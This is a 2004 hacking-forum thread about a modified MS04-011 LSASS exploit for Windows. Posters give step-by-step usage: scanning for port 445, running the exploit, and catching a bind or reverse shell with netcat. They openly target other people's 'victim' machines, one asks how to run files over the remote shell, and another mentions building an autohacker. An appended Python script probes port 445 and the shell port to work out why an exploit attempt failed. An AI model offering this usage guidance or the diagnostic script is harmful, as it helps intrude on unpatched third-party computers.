Found this on SecurityFocus; haven't seen this particular brew of this MS04-011 talked about here yet. The guy that modded it up seemed to do a good job of automating the process more.
EDIT: Well, IMO it works as well as the HOD lsass.exe exploit, but it binds the shell locally without a reverse. Well, it's nice to have it in both versions, thanks for sharing!
Heh, sounds nice.
mRtWiStEr
May 8 2004, 09:20 AM
Nice, nice, love this bug.
Thanks to Microsoft and the coders of this nice xploit! *g*
I got no shell; it says it did, but netcat doesn't make it??? Do you know why?
BlaStA
May 8 2004, 10:49 AM
I think the exploit failed and the port wasn't opened. Try nc -vv ***.***.***.*** 666. Then you get some verbose information.
mRtWiStEr
May 8 2004, 11:10 AM
Hi, thanks for your answer...
Hmm, the IPs I scanned all had the port open....
Are there several ports or just this one port to xploit the machines?
agathos
May 8 2004, 12:04 PM
Well, the source code looks good. It isn't hard to put in a connect-back, but it uses the same vuln as the lsass exploit from me or HOD. Anyway, it's a good exploit.
Greetz, agathos
s3mtexx
May 8 2004, 12:07 PM
Isn't it something like this?
First start nc -vv -L -p <PORT>, then execute xp localhost <PORT>
Connecting... Error, can't connect to victim machine
I always get this message... Am I doing something wrong?
el33t
May 8 2004, 04:14 PM
The target port 445 is blocked by a firewall or router.
LittleHacker
May 8 2004, 06:04 PM
Thanks guys, but it's detected!
HotN0b0dy
May 8 2004, 07:05 PM
So which ports can I try? 666, 555, 333? All of 'em?
Killahbee
May 8 2004, 08:53 PM
Yup, search for servers that have those three ports wide open..... Good luck m8!!
*oink*
mRtWiStEr
May 8 2004, 10:07 PM
QUOTE (HotN0b0dy @ May 8 2004, 07:05 PM)
So which ports can I try? 666, 555, 333? All of 'em?
Yeah, you can use any port for the bindshell.... Just the scan port is 445!
That's it!
(Sorry for my English -> I am from Germany ^^)
andream
May 8 2004, 10:42 PM
Why does this exploit work 1 time in 20? Is it due to the security fix?
Kynroxes
May 8 2004, 10:47 PM
Yeah dude, thanks for the source.
Masterace
May 8 2004, 11:09 PM
THX a lot! This helped me to understand why sometimes it's possible to reconnect to a target and sometimes it's not.
popo0421
May 9 2004, 12:39 AM
Good exploit! THX a lot! I tried to exploit an XP host (unpatched); it always succeeds.
DaClueless
May 9 2004, 01:29 AM
I don't know about you, but this code upsets me and points out why you should NEVER share any source code.
This is mostly stolen code from another exploit, with the author not giving any credit to whom he stole the code from.
Rtyp3
May 9 2004, 01:37 AM
QUOTE (DaClueless @ May 9 2004, 01:29 AM)
I don't know about you, but this code upsets me and points out why you should NEVER share any source code.
This is mostly stolen code from another exploit, with the author not giving any credit to whom he stole the code from.
Jesus Christ, everything is a copy of something else to a degree. Just leave it alone, you and your capitalist thinking. Nice find tho!!
woverin
May 9 2004, 03:43 AM
Thanks for sharing
woverin
May 9 2004, 04:01 AM
After I got a remote shell on the victim machine, how do I transfer and execute via nc? I know how to do it if both the victim and I have nc, but this exploit did not upload nc to the victim. Any help would be appreciated.
DaClueless
May 9 2004, 04:46 AM
QUOTE (Rtyp3 @ May 9 2004, 01:37 AM)
Jesus Christ, everything is a copy of something else to a degree. Just leave it alone, you and your capitalist thinking. Nice find tho!!
I can see you have never spent hours and hours on something that someone took and called their own.
For me, what I see is this: the original author gave us their time and hard work in making the source code for the exploit. I feel we owe it to them to give them credit if you use most of their code.
toska
May 9 2004, 08:48 AM
What the hell? It's not passworded?!?!!? The end of the stupid fad? Heh, nice work mate!
tonikgin
May 9 2004, 11:05 AM
QUOTE (DaClueless @ May 9 2004, 01:29 AM)
I don't know about you, but this code upsets me and points out why you should NEVER share any source code.
This is mostly stolen code from another exploit, with the author not giving any credit to whom he stole the code from.
What about shellcode? Look at how many reverse shell and shell-binding codes are the same. Should they and the basic concept behind how they work be kept locked away for nobody to see? Let's lock up the Linux kernel while we're at it also; too many smart people that understand code are finding weak buffers in it...
I can generally see where you're coming from, but you're just wrong. Every exploit that comes out is based on exploiting one weakness, each its own. But for every advisory, look how many exploits are released for each. It's because code can be improvised to crack something each the way the author intends.
</rant>
But yeah, the author should have at least acknowledged the other releases.
tonikgin
May 9 2004, 11:20 AM
Oh yeah, and on the whole 'passwording files' topic... I wanted to post an actual topic about this in the forum, but I don't feel like it.
People, if you're going to post information on the internet, don't make people have to msg you and kiss your ass for a password.
It's not going to keep it private. I'm going to devote a website to me unrarring people's passworded "private" programs they made and posted onto a website accessible to any idiot w/ an email address.
And a high majority of these programs they are posting are a bunch of OCXs and DLLs... all glued together with some low-level programming code and compiled on some kid's unregistered copy of Visual Basic they downloaded off Kazaa.
</rant>
However, I must say there are people that post unique and creative custom code that is actually of use in this world. To those people that release here, this Bud's for you.
HotN0b0dy
May 9 2004, 02:26 PM
Yeah... this is nice source indeed, but I can't get any shells. Are all ppl patched, or am I doing something wrong?
Bartholo
May 9 2004, 02:55 PM
Thanks for sharing!!
Very nice sploit ;-)
Anarchiste
May 9 2004, 02:57 PM
This exploit uses the same bind shellcode as the HouseOfDaBus version... so if you want a connect-back shell, use the HouseOfDaBus version; it's the same...
HotN0b0dy
May 9 2004, 04:14 PM
Hmm.. I'd really need some help here. Can anyone tell me why I can't connect to the remote PC? C:\FTP Files\Programje\XPhack>xp ***.**.**.*** 666
Did I miss anything? Wrong port? Wrong command? Thx
cross
May 9 2004, 04:47 PM
QUOTE (DaClueless @ May 9 2004, 04:46 AM)
I can see you have never spent hours and hours on something that someone took and called their own.
For me, what I see is this: the original author gave us their time and hard work in making the source code for the exploit. I feel we owe it to them to give them credit if you use most of their code.
If you had read the first post on this thread, you would have seen this:
"Found this on SecurityFocus; haven't seen this particular brew of this MS04-011 talked about here yet. The guy that modded it up seemed to do a good job of automating the process more."
The keyword here is "modded"; he took no credit for the original work. As for credit, just look at the source and you can see where it came from. The open source world is built on people modding other people's work, so get used to it! This is how people learn.
espey
May 9 2004, 07:29 PM
Very good tool, BIG ThX 4 it.
toska
May 9 2004, 10:08 PM
QUOTE (tonikgin @ May 9 2004, 11:20 AM)
Oh yeah, and on the whole 'passwording files' topic... I wanted to post an actual topic about this in the forum, but I don't feel like it.
People, if you're going to post information on the internet, don't make people have to msg you and kiss your ass for a password.
It's not going to keep it private. I'm going to devote a website to me unrarring people's passworded "private" programs they made and posted onto a website accessible to any idiot w/ an email address.
And a high majority of these programs they are posting are a bunch of OCXs and DLLs... all glued together with some low-level programming code and compiled on some kid's unregistered copy of Visual Basic they downloaded off Kazaa.
</rant>
However, I must say there are people that post unique and creative custom code that is actually of use in this world. To those people that release here, this Bud's for you.
Very well said.
bdark
May 9 2004, 11:21 PM
QUOTE (HotN0b0dy @ May 9 2004, 04:14 PM)
Hmm.. I'd really need some help here. Can anyone tell me why I can't connect to the remote PC? C:\FTP Files\Programje\XPhack>xp ***.**.**.*** 666
Did I miss anything? Wrong port? Wrong command? Thx
I guess not.. I've tested it like that and it worked fine...
1st command: xp 10.0.0.0 666
Connecting...Good
Getting a shell...OoOoOps shell!!
2nd command: nc 10.0.0.0 666
C:\windows\system32\
Simple as that =)
Try some other vulnerable boxes.
DaClueless
May 10 2004, 02:24 AM
QUOTE (cross @ May 9 2004, 04:47 PM)
The keyword here is "modded"; he took no credit for the original work. As for credit, just look at the source and you can see where it came from. The open source world is built on people modding other people's work, so get used to it! This is how people learn.
Yes, the open source world is built on modding other people's work so we can all learn from it. But it is not built on people not giving any credit to the original author. I feel it is very simple to give one line that says the code is based on so-and-so's code. I am also so shocked how many people feel there is nothing wrong about using someone's work without giving them any credit.
GNU license agreement:
/* This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */
QUOTE (mRtWiStEr @ May 8 2004, 09:20 AM)
I got no shell; it says it did, but netcat doesn't make it??? Do you know why?
lol! I think it would be better if u play cards or Playmobil! Sorry, but those questions are stupid! Sorry, I am not 100%, but some questions or answers are funny!
HotN0b0dy
May 10 2004, 07:34 AM
Is it possible that my nc isn't working? Cuz I don't get any shells.
DaRul0r
May 10 2004, 02:52 PM
I have the same prob as HotNoob.
bdark
May 10 2004, 05:06 PM
QUOTE (HotN0b0dy @ May 10 2004, 07:34 AM)
Is it possible that my nc isn't working? Cuz I don't get any shells.
I don't think the problem is your netcat. It should be the way you're performing the commands (read all the posts on this topic), or maybe you're trying ranges without vulnerable servers.
EzMe
May 10 2004, 06:01 PM
Very handy for making an autohacker
HotN0b0dy
May 10 2004, 06:34 PM
QUOTE (bdark @ May 10 2004, 05:06 PM)
QUOTE (HotN0b0dy @ May 10 2004, 07:34 AM)
Is it possible that my nc isn't working? Cuz I don't get any shells.
I don't think the problem is your netcat. It should be the way you're performing the commands (read all the posts on this topic), or maybe you're trying ranges without vulnerable servers.
It's the same if I don't type -vv. -vv just tells me where the error is, if there is one. And I scanned IPs before I started exploiting 'em. Are the PCs maybe patched?
LKM
May 10 2004, 06:46 PM
This exploit is easy to use.
First cmd.exe: nc.exe -l -p 66
Second cmd.exe: xp.exe 0 <vic ip> 66 <your ip>
.. .. and you'll get a shell on the first cmd.exe.
If it isn't working, the vic is patched or filtering 445.
Also try several times; sometimes it doesn't work, I don't know why.
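As an added example (mine, not code from the thread or from the exploit's author), here is a small Python probe that does what BlaStA's nc -vv suggestion and LKM's checklist describe by hand: it first asks whether 445 is reachable at all, and only then whether the bind port opened, so a firewall that drops 445 (el33t's case) is not mistaken for a patched host, and a refused bind port after a "successful" run is reported as the shellcode never having bound. It assumes nothing about the exploit itself; the local listener and the released port below are constructed stand-ins so the whole thing runs offline.

```python
import socket

# Port the thread keeps coming back to: MS04-011 is reached over SMB on 445.
# The bind-shell port (666 in most posts, 66 in LKM's) is whatever you passed
# to the exploit; it only exists if the shellcode actually ran.
SMB_PORT = 445


def probe(host, port, timeout=3.0):
    """Classify one TCP port the way the verbose output of nc -vv lets you.

    "open"        handshake completed, something is listening
    "closed"      host answered with RST: reachable, nothing listening
    "filtered"    no answer inside the timeout: firewall/router dropping it
    "unreachable" the local stack could not even route to the host
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"
    except socket.timeout:
        return "filtered"
    except ConnectionRefusedError:
        return "closed"
    except OSError:
        return "unreachable"
    finally:
        s.close()


def diagnose(host, bind_port, smb_port=SMB_PORT, timeout=3.0):
    """Run after the exploit reports a shell; says which step actually failed.

    Order follows the thread: first, could the exploit reach the SMB service
    at all (the "blocked by fw or router" case)? Only if it could is a missing
    bind port evidence that the shellcode never ran (patched host, or a run
    that simply failed, which the thread says happens).
    """
    smb = probe(host, smb_port, timeout)
    if smb != "open":
        return f"{smb_port} is {smb}: the exploit never reached the target service"
    shell = probe(host, bind_port, timeout)
    if shell == "open":
        return f"{smb_port} open and {bind_port} open: connect with nc -vv {host} {bind_port}"
    return (f"{smb_port} open but {bind_port} is {shell}: exploit reached the host "
            f"but no shell was bound (patched, or this run just failed)")


def start_listener():
    """Constructed stand-in for a bound shell: a local listener on an ephemeral port.

    A listening socket completes handshakes into its backlog without accept(),
    which is all probe() needs to see "open"; the backlog is sized for a few probes.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(64)
    return srv, srv.getsockname()[1]


def closed_port():
    """Return a local port with nothing listening (bind an ephemeral one, release it)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    # Offline demo: the listener plays the bind shell (and, via smb_port=, the
    # reachable SMB service); the released port plays a host where nothing bound.
    srv, shell_port = start_listener()
    print("shell port:", probe("127.0.0.1", shell_port))
    print("dead port: ", probe("127.0.0.1", closed_port()))
    print(diagnose("127.0.0.1", shell_port, smb_port=shell_port))
    print(diagnose("127.0.0.1", closed_port(), smb_port=shell_port))
    srv.close()
```

Against a real target you would call probe(target, 445) before the exploit and diagnose(target, 666) after it; "filtered" on 445 means look elsewhere, "closed" on the bind port after a claimed success means the shellcode never got to listen.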
LittleHacker
May 10 2004, 07:05 PM
Please, someone tell me what bug it uses?
tonikgin
May 10 2004, 11:01 PM
^^^^^ ?
It's people like this that keep this board from its true potential.
MS04-011